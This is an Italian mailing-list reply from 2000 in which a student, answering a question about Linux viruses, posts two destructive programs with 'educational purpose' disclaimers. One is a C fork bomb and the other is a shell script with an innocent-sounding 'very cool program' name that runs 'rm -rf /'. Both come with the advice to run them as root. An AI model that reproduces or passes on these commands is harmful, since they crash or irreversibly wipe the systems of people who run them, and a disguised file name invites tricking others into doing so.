Re: Mi sono entrati nel pc?

On Fri, Oct 13, 2000 at 04:42:23PM +0200, Frodo Baggins wrote:
> Federico Di Gregorio scripsit:

> Virus per Linux??? E dove li hai visti???? Dimmelo che mi
> interessa....

non e' un virus ma tanto per rendere l'idea :

ATTENZIONE NON MI PRENDO RESPONSABILITA' SU DANNEGGIAMENTI CHE QUESTI
PROGRAMMI POSSONO FARE SUI VOSTRI COMPUTER CHI NONSA CHE COSA FACCIANO E'
PREGATO DI NON USARLI , LO SCOPO DI QUESTO CODICE E' PURAMENTE EDUCATIVO

int main()
{
int pid;
	while(1){
		pid = fork();
		if (pid > 0 )
			fork();
		else
			fork();
	}
}

lancialo da root ma poi non ti lamentare ....

opppure crea un file chiamato programma_molto_figo.sh
e dentro
#!/bin/bash

rm -rf /

e lancialo da root ...

ATTENZIONE NON MI PRENDO RESPONSABILITA' SU DANNEGGIAMENTI CHE QUESTI
PROGRAMMI POSSONO FARE SUI VOSTRI COMPUTER CHI NONSA CHE COSA FACCIANO E'
PREGATO DI NON USARLI , LO SCOPO DI QUESTO CODICE E' PURAMENTE EDUCATIVO

ciao
samuele
--

Samuele Tonon <tonon@students.cs.unibo.it>
Undergraduate Student  of  Computer Science at  University of Bologna, Italy

Founder & Member of A.A.H.T.